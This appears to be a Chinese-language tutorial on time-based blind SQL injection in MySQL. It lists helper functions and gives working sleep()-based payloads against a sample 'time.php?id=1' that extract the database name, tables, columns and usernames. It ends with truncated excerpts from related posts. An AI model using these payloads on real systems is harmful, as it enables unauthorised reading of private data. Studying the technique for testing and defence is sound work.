時間盲注**存在sql注入漏洞,然而頁面既不會回顯資料,也不會回顯錯誤資訊,語句執行後也不提示真假,我們不能通過頁面的內容來判斷。這裡我們可以通過構造語句,通過頁面響應的時長,來判斷資訊,這既是時間盲注
left(m,n) --從左向右擷取字串m返回其前n位
substr(m,1,1) --取字串m的左邊第一位起,1字長的字串
ascii(m) --返回字元m的ascii碼
if(str1,str2,str3)--如果str1正確就執行str2,否則執行str3
sleep(m)--使程式暫停m秒
length(m) --返回字串m的長度
count(column_name) --返回指定列的值的數目
if(length(database())>1,sleep(5),1)
如果資料庫名字元長度大於1為真,mysql休眠5 秒,如果為假則查詢1。而查詢1的結果,大約只有幾十毫秒,根據burp suite中頁面的響應時間,可以判斷條件是否正確。
判斷資料庫名的長度
time.php?id=1 and if(length(database())>=6,sleep(5),1)
爆庫名
time.php?id=1 and if(substr(database(),1,1)='a',sleep(5),1) 資料庫名為test
爆表名
time.php?id=1 and if(substr((select table_name from information_schema.tables where table_schema='test' limit 0,1),1,1)='a',sleep(5),1)
爆欄位
time.php?id=1 and if(substr((select column_name from information_schema.columns where table_schema='test' and table_name='users' limit 0,1),1,1)='a',sleep(5),1)
爆資料
time.php?id=1 and if(substr(select username from test.users limit 0,1),1,1)='a',sleep(5),1)
SQL盲注 時間盲注,dnslog盲注
時間盲注原理 id get id sql select from users where id id limit 0,1 result mysql query sql row mysql fetch array result if row else 存在sql注入漏洞 然而頁面不會回顯資料,也不會回...
sql盲注特點 SQL盲注
盲注原理 盲注的分類 盲注常用函式 一 sql盲注概述 1.如果資料庫執行返回結果時只反饋對錯不會返回資料庫中的資訊 此時可以採用邏輯判斷是否正確的盲注來獲取資訊。2.盲注是不能通過直接顯示的途徑來獲取資料庫資料的方法。在盲注中,攻擊者根據其返回頁面的不同來判斷資訊 可能是頁面內容的不同,也可以是響...
時間盲注手注
基於時間的盲注 時間的概念 使用特定函式讓資料庫去執行,通過自己的設定,來檢視資料庫是否get到我們的請求 函式sleep 設定資料庫的延時或者暫停的時間 函式limit 0,1 限制第乙個的第乙個字元 函式mid 1,1 從第乙個字元開始擷取,只擷取乙個 函式benchmark 引數一,引數二 第...